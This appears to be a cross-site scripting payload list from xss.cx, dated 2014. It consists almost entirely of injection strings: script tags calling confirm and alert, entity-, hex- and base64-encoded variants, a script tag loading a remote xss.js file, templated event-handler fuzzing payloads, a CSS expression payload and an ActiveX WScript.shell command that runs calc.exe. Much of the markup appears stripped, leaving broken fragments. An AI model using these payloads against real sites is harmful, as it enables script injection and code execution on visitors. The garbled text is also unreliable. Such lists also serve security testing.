/* Remote File Include with HTML TAGS via XSS.Cx */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */ /* Updated September 29, 2014 */ /* RFI START */

"]

X`

]><SCRIPT>confirm(1)</SCRIPT>

><SCRIPT>confirm(1)</SCRIPT>

")>

#0000118as&#0000099ri&#0000112t:&#0000097le&#0000114t(&#0000039XS&#0000083')> #115;cript:alert('XS;S')> #x63ript:&#x61lert(&#x27XSS')> < <

PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+ confirm(1) confirm(document.location) MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);# ">'> PT SRC="http://xss.cx/xss.js"> SRC= "> < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > Click Me ClickMe ClickMe CLICK name a link CLICK click Clickhere Xclick hello click "/>XXClick Me click test "/>test aa X X test Right click open in new tab "/>Click Here ">Click Here Click-XSS ">" charset=utf- '`"><*chr*script>log(*num*) Save // <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"> <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"> <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')">

x <%div%20style=xss:expression(prompt(1))>

exp/*'/ for(i=10;i>1;i--)confirm(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true);